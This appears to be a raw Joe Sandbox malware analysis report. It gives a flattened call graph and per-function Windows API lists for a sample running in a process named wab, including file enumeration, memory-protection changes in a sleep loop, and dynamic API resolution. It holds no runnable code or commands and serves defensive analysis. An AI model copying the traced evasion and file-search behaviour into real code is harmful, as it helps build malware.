375638dc SetLastError 7121->7122 7123 37563ba2 6 API calls 7121->7123 7128 37563896 7121->7128 7122->7113 7124 37563890 7123->7124 7125 375638b8 7124->7125 7126 37563ba2 6 API calls 7124->7126 7124->7128 7127 37563ba2 6 API calls 7125->7127 7125->7128 7126->7125 7127->7128 7128->7122 7130 37562485 7129->7130 7156 37562933 IsProcessorFeaturePresent 7130->7156 7134 37562496 7135 3756249a 7134->7135 7167 375653c8 7134->7167 7135->6986 7138 375624b1 7138->6986 7139 37563529 8 API calls 7139->7135 7198 375624b5 7140->7198 7142 375623e5 7142->6992 7143->6995 7145 375646dc 7144->7145 7146 37562ada 5 API calls 7145->7146 7147 37561fad 7146->7147 7147->6994 7148 375623b3 7147->7148 7149 375623b8 7148->7149 7150 37562933 IsProcessorFeaturePresent 7149->7150 7151 375623c1 7149->7151 7150->7151 7151->6999 7153 3756264e 7152->7153 7154 375626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7153->7154 7155 37562744 7154->7155 7155->6991 7157 37562491 7156->7157 7158 375634ea 7157->7158 7159 375634ef 7158->7159 7170 37563936 7159->7170 7162 375634fd 7162->7134 7164 37563505 7165 37563510 7164->7165 7166 37563972 RtlDeleteCriticalSection 7164->7166 7165->7134 7166->7162 7194 37567457 7167->7194 7171 3756393f 7170->7171 7173 37563968 7171->7173 7174 375634f9 7171->7174 7184 37563be0 7171->7184 7175 37563972 RtlDeleteCriticalSection 7173->7175 7174->7162 7176 375638e8 7174->7176 7175->7174 7189 37563af1 7176->7189 7179 375638fd 7179->7164 7180 37563ba2 6 API calls 7181 3756390b 7180->7181 7182 37563918 7181->7182 7183 3756391b 6 API calls 7181->7183 7182->7164 7183->7179 7185 37563a82 5 API calls 7184->7185 7186 37563bfa 7185->7186 7187 37563c18 InitializeCriticalSectionAndSpinCount 7186->7187 7188 37563c03 7186->7188 7187->7188 7188->7171 7190 37563a82 5 API calls 7189->7190 7191 37563b0b 7190->7191 7192 37563b24 TlsAlloc 7191->7192 7193 375638f2 7191->7193 7193->7179 7193->7180 7197 37567470 7194->7197 7195 37562ada 5 API calls 7196 375624a3 7195->7196 7196->7138 7196->7139 7197->7195 7199 375624c4 7198->7199 7200 375624c8 7198->7200 7199->7142 7201 37562639 4 API calls 7200->7201 7203 375624d5 7200->7203 7202 37562559 7201->7202 7203->7142 7205 37562451 7204->7205 7206 37562455 7205->7206 7209 37562461 7205->7209 7207 3756527a 20 API calls 7206->7207 7208 3756245f 7207->7208 7208->7008 7210 3756246e 7209->7210 7211 3756499b 28 API calls 7209->7211 7210->7008 7212 37564bbd 7211->7212 7212->7008 7225 375634c7 RtlInterlockedFlushSList 7213->7225 7215 37562312 7215->7010 7227 3756246f 7216->7227 7218 375620c9 7218->7012 7220 37562617 7219->7220 7221 3756262d 7220->7221 7246 375653ed 7220->7246 7221->7014 7224 37563529 8 API calls 7224->7221 7226 375634d7 7225->7226 7226->7215 7232 375653ff 7227->7232 7230 3756391b 6 API calls 7231 3756354d 7230->7231 7231->7218 7235 37565c2b 7232->7235 7236 37565c35 7235->7236 7237 37562476 7235->7237 7239 37565db2 7236->7239 7237->7230 7240 37565c45 5 API calls 7239->7240 7241 37565dd9 7240->7241 7242 37565df1 TlsFree 7241->7242 7243 37565de5 7241->7243 7242->7243 7244 37562ada 5 API calls 7243->7244 7245 37565e02 7244->7245 7245->7237 7249 375674da 7246->7249 7252 375674f3 7249->7252 7250 37562ada 5 API calls 7251 37562625 7250->7251 7251->7224 7252->7250 7686 3756508a 7687 375650a2 7686->7687 7688 3756509c 7686->7688 7689 37565000 20 API calls 7688->7689 7689->7687 6481 37567b48 6491 37568ebf 6481->6491 6485 37567b55 6504 3756907c 6485->6504 6488 37567b7f 6489 3756571e 20 API calls 6488->6489 6490 37567b8a 6489->6490 6508 37568ec8 6491->6508 6493 37567b50 6494 37568fdc 6493->6494 6495 37568fe8 6494->6495 6528 37565671 RtlEnterCriticalSection 6495->6528 6497 3756905e 6542 37569073 6497->6542 6499 3756906a 6499->6485 6500 37569032 RtlDeleteCriticalSection 6502 3756571e 20 API calls 6500->6502 6503 37568ff3 6502->6503 6503->6497 6503->6500 6529 3756a09c 6503->6529 6505 37569092 6504->6505 6507 37567b64 RtlDeleteCriticalSection 6504->6507 6506 3756571e 20 API calls 6505->6506 6505->6507 6506->6507 6507->6485 6507->6488 6509 37568ed4 6508->6509 6518 37565671 RtlEnterCriticalSection 6509->6518 6511 37568f77 6523 37568f97 6511->6523 6515 37568ee3 6515->6511 6517 37568e78 66 API calls 6515->6517 6519 37567b94 RtlEnterCriticalSection 6515->6519 6520 37568f6d 6515->6520 6516 37568f83 6516->6493 6517->6515 6518->6515 6519->6515 6526 37567ba8 RtlLeaveCriticalSection 6520->6526 6522 37568f75 6522->6515 6527 375656b9 RtlLeaveCriticalSection 6523->6527 6525 37568f9e 6525->6516 6526->6522 6527->6525 6528->6503 6530 3756a0a8 6529->6530 6531 3756a0ce 6530->6531 6532 3756a0b9 6530->6532 6541 3756a0c9 6531->6541 6545 37567b94 RtlEnterCriticalSection 6531->6545 6533 37566368 20 API calls 6532->6533 6534 3756a0be 6533->6534 6536 375662ac 26 API calls 6534->6536 6536->6541 6537 3756a0ea 6546 3756a026 6537->6546 6539 3756a0f5 6562 3756a112 6539->6562 6541->6503 6810 375656b9 RtlLeaveCriticalSection 6542->6810 6544 3756907a 6544->6499 6545->6537 6547 3756a033 6546->6547 6548 3756a048 6546->6548 6549 37566368 20 API calls 6547->6549 6554 3756a043 6548->6554 6565 37568e12 6548->6565 6551 3756a038 6549->6551 6553 375662ac 26 API calls 6551->6553 6553->6554 6554->6539 6555 3756907c 20 API calls 6556 3756a064 6555->6556 6571 37567a5a 6556->6571 6558 3756a06a 6578 3756adce 6558->6578 6561 3756571e 20 API calls 6561->6554 6809 37567ba8 RtlLeaveCriticalSection 6562->6809 6564 3756a11a 6564->6541 6566 37568e2a 6565->6566 6568 37568e26 6565->6568 6567 37567a5a 26 API calls 6566->6567 6566->6568 6569 37568e4a 6567->6569 6568->6555 6593 37569a22 6569->6593 6572 37567a66 6571->6572 6573 37567a7b 6571->6573 6574 37566368 20 API calls 6572->6574 6573->6558 6575 37567a6b 6574->6575 6576 375662ac 26 API calls 6575->6576 6577 37567a76 6576->6577 6577->6558 6579 3756adf2 6578->6579 6580 3756addd 6578->6580 6581 3756ae2d 6579->6581 6585 3756ae19 6579->6585 6582 37566355 20 API calls 6580->6582 6583 37566355 20 API calls 6581->6583 6584 3756ade2 6582->6584 6586 3756ae32 6583->6586 6587 37566368 20 API calls 6584->6587 6766 3756ada6 6585->6766 6589 37566368 20 API calls 6586->6589 6590 3756a070 6587->6590 6591 3756ae3a 6589->6591 6590->6554 6590->6561 6592 375662ac 26 API calls 6591->6592 6592->6590 6594 37569a2e 6593->6594 6595 37569a36 6594->6595 6596 37569a4e 6594->6596 6618 37566355 6595->6618 6598 37569aec 6596->6598 6602 37569a83 6596->6602 6600 37566355 20 API calls 6598->6600 6603 37569af1 6600->6603 6601 37566368 20 API calls 6604 37569a43 6601->6604 6621 37568c7b RtlEnterCriticalSection 6602->6621 6606 37566368 20 API calls 6603->6606 6604->6568 6608 37569af9 6606->6608 6607 37569a89 6609 37569aa5 6607->6609 6610 37569aba 6607->6610 6611 375662ac 26 API calls 6608->6611 6613 37566368 20 API calls 6609->6613 6622 37569b0d 6610->6622 6611->6604 6614 37569aaa 6613->6614 6615 37566355 20 API calls 6614->6615 6617 37569ab5 6615->6617 6673 37569ae4 6617->6673 6619 37565b7a 20 API calls 6618->6619 6620 3756635a 6619->6620 6620->6601 6621->6607 6623 37569b3b 6622->6623 6661 37569b34 6622->6661 6624 37569b5e 6623->6624 6625 37569b3f 6623->6625 6628 37569baf 6624->6628 6629 37569b92 6624->6629 6627 37566355 20 API calls 6625->6627 6626 37562ada 5 API calls 6630 37569d15 6626->6630 6631 37569b44 6627->6631 6633 37569bc5 6628->6633 6676 3756a00b 6628->6676 6632 37566355 20 API calls 6629->6632 6630->6617 6634 37566368 20 API calls 6631->6634 6635 37569b97 6632->6635 6679 375696b2 6633->6679 6637 37569b4b 6634->6637 6639 37566368 20 API calls 6635->6639 6640 375662ac 26 API calls 6637->6640 6644 37569b9f 6639->6644 6640->6661 6642 37569bd3 6645 37569bd7 6642->6645 6646 37569bf9 6642->6646 6643 37569c0c 6648 37569c66 WriteFile 6643->6648 6649 37569c20 6643->6649 6647 375662ac 26 API calls 6644->6647 6650 37569ccd 6645->6650 6686 37569645 6645->6686 6691 37569492 GetConsoleCP 6646->6691 6647->6661 6652 37569c89 GetLastError 6648->6652 6660 37569bef 6648->6660 6653 37569c56 6649->6653 6654 37569c28 6649->6654 6650->6661 6662 37566368 20 API calls 6650->6662 6652->6660 6717 37569728 6653->6717 6657 37569c46 6654->6657 6658 37569c2d 6654->6658 6709 375698f5 6657->6709 6658->6650 6702 37569807 6658->6702 6660->6650 6660->6661 6664 37569ca9 6660->6664 6661->6626 6663 37569cf2 6662->6663 6666 37566355 20 API calls 6663->6666 6667 37569cc4 6664->6667 6668 37569cb0 6664->6668 6666->6661 6724 37566332 6667->6724 6670 37566368 20 API calls 6668->6670 6671 37569cb5 6670->6671 6672 37566355 20 API calls 6671->6672 6672->6661 6765 37568c9e RtlLeaveCriticalSection 6673->6765 6675 37569aea 6675->6604 6729 37569f8d 6676->6729 6751 37568dbc 6679->6751 6681 375696c2 6682 375696c7 6681->6682 6683 37565af6 38 API calls 6681->6683 6682->6642 6682->6643 6684 375696ea 6683->6684 6684->6682 6685 37569708 GetConsoleMode 6684->6685 6685->6682 6689 3756969f 6686->6689 6690 3756966a 6686->6690 6687 3756a181 WriteConsoleW CreateFileW 6687->6690 6688 375696a1 GetLastError 6688->6689 6689->6660 6690->6687 6690->6688 6690->6689 6692 37569607 6691->6692 6696 375694f5 6691->6696 6693 37562ada 5 API calls 6692->6693 6694 37569641 6693->6694 6694->6660 6696->6692 6697 3756957b WideCharToMultiByte 6696->6697 6699 375679e6 40 API calls 6696->6699 6701 375695d2 WriteFile 6696->6701 6760 37567c19 6696->6760 6697->6692 6698 375695a1 WriteFile 6697->6698 6698->6696 6700 3756962a GetLastError 6698->6700 6699->6696 6700->6692 6701->6696 6701->6700 6707 37569816 6702->6707 6703 375698d8 6704 37562ada 5 API calls 6703->6704 6708 375698f1 6704->6708 6705 37569894 WriteFile 6706 375698da GetLastError 6705->6706 6705->6707 6706->6703 6707->6703 6707->6705 6708->6660 6714 37569904 6709->6714 6710 37569a0f 6711 37562ada 5 API calls 6710->6711 6713 37569a1e 6711->6713 6712 37569986 WideCharToMultiByte 6715 37569a07 GetLastError 6712->6715 6716 375699bb WriteFile 6712->6716 6713->6660 6714->6710 6714->6712 6714->6716 6715->6710 6716->6714 6716->6715 6718 37569737 6717->6718 6719 375697ea 6718->6719 6721 375697a9 WriteFile 6718->6721 6720 37562ada 5 API calls 6719->6720 6722 37569803 6720->6722 6721->6718 6723 375697ec GetLastError 6721->6723 6722->6660 6723->6719 6725 37566355 20 API calls 6724->6725 6726 3756633d 6725->6726 6727 37566368 20 API calls 6726->6727 6728 37566350 6727->6728 6728->6661 6738 37568d52 6729->6738 6731 37569f9f 6732 37569fa7 6731->6732 6733 37569fb8 SetFilePointerEx 6731->6733 6734 37566368 20 API calls 6732->6734 6735 37569fd0 GetLastError 6733->6735 6736 37569fac 6733->6736 6734->6736 6737 37566332 20 API calls 6735->6737 6736->6633 6737->6736 6739 37568d5f 6738->6739 6742 37568d74 6738->6742 6740 37566355 20 API calls 6739->6740 6741 37568d64 6740->6741 6744 37566368 20 API calls 6741->6744 6743 37566355 20 API calls 6742->6743 6745 37568d99 6742->6745 6746 37568da4 6743->6746 6748 37568d6c 6744->6748 6745->6731 6747 37566368 20 API calls 6746->6747 6749 37568dac 6747->6749 6748->6731 6750 375662ac 26 API calls 6749->6750 6750->6748 6752 37568dc9 6751->6752 6754 37568dd6 6751->6754 6753 37566368 20 API calls 6752->6753 6755 37568dce 6753->6755 6756 37568de2 6754->6756 6757 37566368 20 API calls 6754->6757 6755->6681 6756->6681 6758 37568e03 6757->6758 6759 375662ac 26 API calls 6758->6759 6759->6755 6761 37565af6 38 API calls 6760->6761 6762 37567c24 6761->6762 6763 37567a00 38 API calls 6762->6763 6764 37567c34 6763->6764 6764->6696 6765->6675 6769 3756ad24 6766->6769 6768 3756adca 6768->6590 6770 3756ad30 6769->6770 6780 37568c7b RtlEnterCriticalSection 6770->6780 6772 3756ad3e 6773 3756ad65 6772->6773 6774 3756ad70 6772->6774 6781 3756ae4d 6773->6781 6776 37566368 20 API calls 6774->6776 6777 3756ad6b 6776->6777 6796 3756ad9a 6777->6796 6779 3756ad8d 6779->6768 6780->6772 6782 37568d52 26 API calls 6781->6782 6784 3756ae5d 6782->6784 6783 3756ae63 6799 37568cc1 6783->6799 6784->6783 6786 3756ae95 6784->6786 6789 37568d52 26 API calls 6784->6789 6786->6783 6787 37568d52 26 API calls 6786->6787 6790 3756aea1 CloseHandle 6787->6790 6792 3756ae8c 6789->6792 6790->6783 6793 3756aead GetLastError 6790->6793 6791 3756aedd 6791->6777 6795 37568d52 26 API calls 6792->6795 6793->6783 6794 37566332 20 API calls 6794->6791 6795->6786 6808 37568c9e RtlLeaveCriticalSection 6796->6808 6798 3756ada4 6798->6779 6800 37568d37 6799->6800 6801 37568cd0 6799->6801 6802 37566368 20 API calls 6800->6802 6801->6800 6807 37568cfa 6801->6807 6803 37568d3c 6802->6803 6804 37566355 20 API calls 6803->6804 6805 37568d27 6804->6805 6805->6791 6805->6794 6806 37568d21 SetStdHandle 6806->6805 6807->6805 6807->6806 6808->6798 6809->6564 6810->6544 6811 37565348 6814 37563529 6811->6814 6815 37563543 6814->6815 6816 37563532 6814->6816 6822 3756391b 6816->6822 6823 37563925 6822->6823 6824 37563537 6822->6824 6834 37563b2c 6823->6834 6826 37563972 6824->6826 6827 3756353c 6826->6827 6828 3756397d 6826->6828 6830 37563c50 6827->6830 6829 37563987 RtlDeleteCriticalSection 6828->6829 6829->6827 6829->6829 6831 37563c59 6830->6831 6832 37563c7f 6830->6832 6831->6832 6833 37563c69 FreeLibrary 6831->6833 6832->6815 6833->6831 6839 37563a82 6834->6839 6836 37563b46 6837 37563b5e TlsFree 6836->6837 6838 37563b52 6836->6838 6837->6838 6838->6824 6840 37563aaa 6839->6840 6844 37563aa6 6839->6844 6840->6844 6845 375639be 6840->6845 6843 37563ac4 GetProcAddress 6843->6844 6844->6836 6849 375639cd 6845->6849 6846 37563a77 6846->6843 6846->6844 6847 375639ea LoadLibraryExW 6848 37563a05 GetLastError 6847->6848 6847->6849 6848->6849 6849->6846 6849->6847 6850 37563a60 FreeLibrary 6849->6850 6851 37563a38 LoadLibraryExW 6849->6851 6850->6849 6851->6849 7690 37568a89 7691 37566d60 51 API calls 7690->7691 7692 37568a8e 7691->7692 7693 37563eb3 7694 37565411 38 API calls 7693->7694 7695 37563ebb 7694->7695 6852 37563370 6863 37563330 6852->6863 6864 37563342 6863->6864 6865 3756334f 6863->6865 6866 37562ada 5 API calls 6864->6866 6866->6865 7253 37565630 7256 3756563b 7253->7256 7255 37565664 7266 37565688 7255->7266 7256->7255 7257 37565660 7256->7257 7259 37565eb7 7256->7259 7260 37565c45 5 API calls 7259->7260 7261 37565ede 7260->7261 7262 37565efc InitializeCriticalSectionAndSpinCount 7261->7262 7263 37565ee7 7261->7263 7262->7263 7264 37562ada 5 API calls 7263->7264 7265 37565f13 7264->7265 7265->7256 7267 375656b4 7266->7267 7268 37565695 7266->7268 7267->7257 7269 3756569f RtlDeleteCriticalSection 7268->7269 7269->7267 7269->7269 7596 375663f0 7597 37566400 7596->7597 7600 37566416 7596->7600 7598 37566368 20 API calls 7597->7598 7599 37566405 7598->7599 7602 375662ac 26 API calls 7599->7602 7606 37566561 7600->7606 7609 37566480 7600->7609 7615 37566580 7600->7615 7601 37564e76 20 API calls 7608 375664e5 7601->7608 7610 3756640f 7602->7610 7604 375664ee 7605 3756571e 20 API calls 7604->7605 7605->7606 7635 3756679a 7606->7635 7608->7604 7612 37566573 7608->7612 7626 375685eb 7608->7626 7609->7601 7613 375662bc 11 API calls 7612->7613 7614 3756657f 7613->7614 7616 3756658c 7615->7616 7616->7616 7617 3756637b 20 API calls 7616->7617 7618 375665ba 7617->7618 7619 375685eb 26 API calls 7618->7619 7620 375665e6 7619->7620 7621 375662bc 11 API calls 7620->7621 7622 37566615 7621->7622 7623 375666b6 FindFirstFileExA 7622->7623 7624 37566705 7623->7624 7625 37566580 26 API calls 7624->7625 7630 3756853a 7626->7630 7627 3756854f 7628 37566368 20 API calls 7627->7628 7629 37568554 7627->7629 7631 3756857a 7628->7631 7629->7608 7630->7627 7630->7629 7633 3756858b 7630->7633 7632 375662ac 26 API calls 7631->7632 7632->7629 7633->7629 7634 37566368 20 API calls 7633->7634 7634->7631 7636 375667a4 7635->7636 7637 375667b4 7636->7637 7638 3756571e 20 API calls 7636->7638 7639 3756571e 20 API calls 7637->7639 7638->7636 7640 375667bb 7639->7640 7640->7610 6867 37569e71 6868 37569e95 6867->6868 6869 37569eae 6868->6869 6871 3756ac6b 6868->6871 6872 37569ef8 6869->6872 6875 3756aa53 6869->6875 6874 3756acad 6871->6874 6885 3756b2f0 6871->6885 6876 3756aa70 RtlDecodePointer 6875->6876 6877 3756aa80 6875->6877 6876->6877 6878 3756ab0d 6877->6878 6881 3756ab02 6877->6881 6883 3756aab7 6877->6883 6878->6881 6882 37566368 20 API calls 6878->6882 6879 37562ada 5 API calls 6880 3756ac67 6879->6880 6880->6872 6881->6879 6882->6881 6883->6881 6884 37566368 20 API calls 6883->6884 6884->6881 6886 3756b329 6885->6886 6887 3756b5c1 RaiseException 6886->6887 6888 3756b350 6886->6888 6887->6888 6889 3756b393 6888->6889 6890 3756b36e 6888->6890 6891 3756b8b2 20 API calls 6889->6891 6896 3756b8e1 6890->6896 6893 3756b38e 6891->6893 6894 37562ada 5 API calls 6893->6894 6895 3756b3b7 6894->6895 6895->6874 6897 3756b8f0 6896->6897 6898 3756b964 6897->6898 6899 3756b90f 6897->6899 6900 3756b8b2 20 API calls 6898->6900 6901 375678a3 5 API calls 6899->6901 6904 3756b95d 6900->6904 6902 3756b950 6901->6902 6903 3756b8b2 20 API calls 6902->6903 6902->6904 6903->6904 6904->6893 7641 37565bff 7649 37565d5c 7641->7649 7644 37565b7a 20 API calls 7645 37565c1b 7644->7645 7646 37565c28 7645->7646 7647 37565c2b 11 API calls 7645->7647 7648 37565c13 7647->7648 7650 37565c45 5 API calls 7649->7650 7651 37565d83 7650->7651 7652 37565d9b TlsAlloc 7651->7652 7655 37565d8c 7651->7655 7652->7655 7653 37562ada 5 API calls 7654 37565c09 7653->7654 7654->7644 7654->7648 7655->7653 7700 375667bf 7705 375667f4 7700->7705 7703 375667db 7704 3756571e 20 API calls 7704->7703 7706 37566806 7705->7706 7714 375667cd 7705->7714 7707 37566836 7706->7707 7708 3756680b 7706->7708 7707->7714 7716 375671d6 7707->7716 7709 3756637b 20 API calls 7708->7709 7710 37566814 7709->7710 7712 3756571e 20 API calls 7710->7712 7712->7714 7713 37566851 7715 3756571e 20 API calls 7713->7715 7714->7703 7714->7704 7715->7714 7717 375671e1 7716->7717 7718 37567209 7717->7718 7719 375671fa 7717->7719 7721 37567218 7718->7721 7725 37568a98 7718->7725 7722 37566368 20 API calls 7719->7722 7732 37568acb 7721->7732 7724 375671ff 7722->7724 7724->7713 7726 37568aa3 7725->7726 7727 37568ab8 RtlSizeHeap 7725->7727 7728 37566368 20 API calls 7726->7728 7727->7721 7729 37568aa8 7728->7729 7730 375662ac 26 API calls 7729->7730 7731 37568ab3 7730->7731 7731->7721 7733 37568ae3 7732->7733 7734 37568ad8 7732->7734 7736 37568aeb 7733->7736 7742 37568af4 7733->7742 7735 375656d0 21 API calls 7734->7735 7740 37568ae0 7735->7740 7737 3756571e 20 API calls 7736->7737 7737->7740 7738 37568b1e RtlReAllocateHeap 7738->7740 7738->7742 7739 37568af9 7741 37566368 20 API calls 7739->7741 7740->7724 7741->7740 7742->7738 7742->7739 7743 3756474f 7 API calls 7742->7743 7743->7742 7270 3756543d 7271 37565440 7270->7271 7272 375655a8 38 API calls 7271->7272 7273 3756544c 7272->7273 7744 37569db8 7745 37569dbf 7744->7745 7746 37569e20 7745->7746 7747 37569ddf 7745->7747 7748 3756aa17 21 API calls 7746->7748 7749 3756a90e 7746->7749 7747->7749 7751 3756aa17 21 API calls 7747->7751 7750 37569e6e 7748->7750 7752 3756a93e 7751->7752 5762 3756c7a7 5763 3756c7be 5762->5763 5767 3756c82c 5762->5767 5763->5767 5774 3756c7e6 GetModuleHandleA 5763->5774 5764 3756c835 GetModuleHandleA 5768 3756c83f 5764->5768 5765 3756c872 5767->5764 5767->5765 5767->5768 5768->5767 5769 3756c85f GetProcAddress 5768->5769 5769->5767 5770 3756c7dd 5770->5767 5770->5768 5771 3756c800 GetProcAddress 5770->5771 5771->5767 5772 3756c80d VirtualProtect 5771->5772 5772->5767 5773 3756c81c VirtualProtect 5772->5773 5773->5767 5775 3756c7ef 5774->5775 5781 3756c82c 5774->5781 5786 3756c803 GetProcAddress 5775->5786 5777 3756c835 GetModuleHandleA 5784 3756c83f 5777->5784 5778 3756c872 5779 3756c7f4 5780 3756c800 GetProcAddress 5779->5780 5779->5781 5780->5781 5782 3756c80d VirtualProtect 5780->5782 5781->5777 5781->5778 5781->5784 5782->5781 5783 3756c81c VirtualProtect 5782->5783 5783->5781 5784->5781 5785 3756c85f GetProcAddress 5784->5785 5785->5781 5787 3756c82c 5786->5787 5788 3756c80d VirtualProtect 5786->5788 5790 3756c835 GetModuleHandleA 5787->5790 5791 3756c872 5787->5791 5788->5787 5789 3756c81c VirtualProtect 5788->5789 5789->5787 5793 3756c83f 5790->5793 5792 3756c85f GetProcAddress 5792->5793 5793->5787 5793->5792 7656 3756a1e0 7659 3756a1fe 7656->7659 7658 3756a1f6 7662 3756a203 7659->7662 7660 3756a298 7660->7658 7661 3756aa53 21 API calls 7663 3756a42f 7661->7663 7662->7660 7662->7661 7663->7658 7753 375681a0 7754 375681d9 7753->7754 7755 375681dd 7754->7755 7766 37568205 7754->7766 7756 37566368 20 API calls 7755->7756 7757 375681e2 7756->7757 7759 375662ac 26 API calls 7757->7759 7758 37568529 7760 37562ada 5 API calls 7758->7760 7761 375681ed 7759->7761 7762 37568536 7760->7762 7763 37562ada 5 API calls 7761->7763 7764 375681f9 7763->7764 7766->7758 7767 375680c0 7766->7767 7770 375680db 7767->7770 7768 37562ada 5 API calls 7769 37568152 7768->7769 7769->7766 7770->7768 7770->7770 7771 375621a1 7774 37562418 7771->7774 7775 37562420 7774->7775 7778 375647f5 7775->7778 7777 375621bc 7779 37564804 7778->7779 7780 37564808 7778->7780 7779->7777 7783 37564815 7780->7783 7784 37565b7a 20 API calls 7783->7784 7787 3756482c 7784->7787 7785 37562ada 5 API calls 7786 37564811 7785->7786 7786->7777 7787->7785 6905 3756506f 6906 37565081 6905->6906 6907 37565087 6905->6907 6909 37565000 6906->6909 6913 3756500d 6909->6913 6914 3756502a 6909->6914 6910 37565024 6912 3756571e 20 API calls 6910->6912 6911 3756571e 20 API calls 6911->6913 6912->6914 6913->6910 6913->6911 6914->6907 7788 375660ac 7790 375660b7 7788->7790 7791 375660dd 7788->7791 7789 375660c7 FreeLibrary 7789->7790 7790->7789 7790->7791 6915 3756ac6b 6916 3756ac84 6915->6916 6917 3756acad 6916->6917 6918 3756b2f0 21 API calls 6916->6918 6918->6917 7274 3756742b 7275 37567430 7274->7275 7277 37567453 7275->7277 7278 37568bae 7275->7278 7279 37568bbb 7278->7279 7283 37568bdd 7278->7283 7280 37568bd7 7279->7280 7281 37568bc9 RtlDeleteCriticalSection 7279->7281 7282 3756571e 20 API calls 7280->7282 7281->7280 7281->7281 7282->7283 7283->7275

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 375610F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37561137
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 37561151
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756115C
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756116D
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756117C
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37561193
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 375611D0
                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 375611DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                                          • Opcode ID: 8bba3af6ec4be3ba0efbcf72f37173bee688940de6224bd0f5d877452d86f6de
                                                                                                                                                                                                          • Instruction ID: f7f50446d4424fea188da2fa837c9596bb7df22b9fd5f8169dd08c201d462f41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bba3af6ec4be3ba0efbcf72f37173bee688940de6224bd0f5d877452d86f6de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 142185715443486BD714EA649C4DF9B7B9CEF84324F000D2AF998E3190FB79D60587D6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 034A3947 Relevance: 3.1, APIs: 2, Instructions: 61sleepnativeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 130 34a3947-34a3981 131 34a3986-34a399d call 34a3ba3 130->131 133 34a399f-34a39a4 131->133 134 34a39a6-34a39b5 131->134 133->134 135 34a39c6-34a3a14 NtProtectVirtualMemory call 34a3ba3 134->135 136 34a39b7-34a39c4 Sleep 134->136 139 34a3a19-34a3a27 135->139 136->130 139->130
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(00000005), ref: 034A39C1
                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 034A3A0E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, Offset: 030B1000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_30b1000_wab.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MemoryProtectSleepVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3235210055-0
                                                                                                                                                                                                          • Opcode ID: 48b640ef072aa8f77f74ce3f5f828450ba3550b315b2660e59a810925b7d958c
                                                                                                                                                                                                          • Instruction ID: 71e581a97e8bf692c7dd045da3408f7a864d9a953bbd5e196255cbe19645afaa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b640ef072aa8f77f74ce3f5f828450ba3550b315b2660e59a810925b7d958c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A41189B9900B019FEB01AE7DC99CB867379AF247E1F894288ED654F1E6E374C4808F11
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375612EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37561434
                                                                                                                                                                                                            • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37561137
                                                                                                                                                                                                            • Part of subcall function 375610F1: lstrcatW.KERNEL32(?,?), ref: 37561151
                                                                                                                                                                                                            • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756115C
                                                                                                                                                                                                            • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756116D
                                                                                                                                                                                                            • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756117C
                                                                                                                                                                                                            • Part of subcall function 375610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37561193
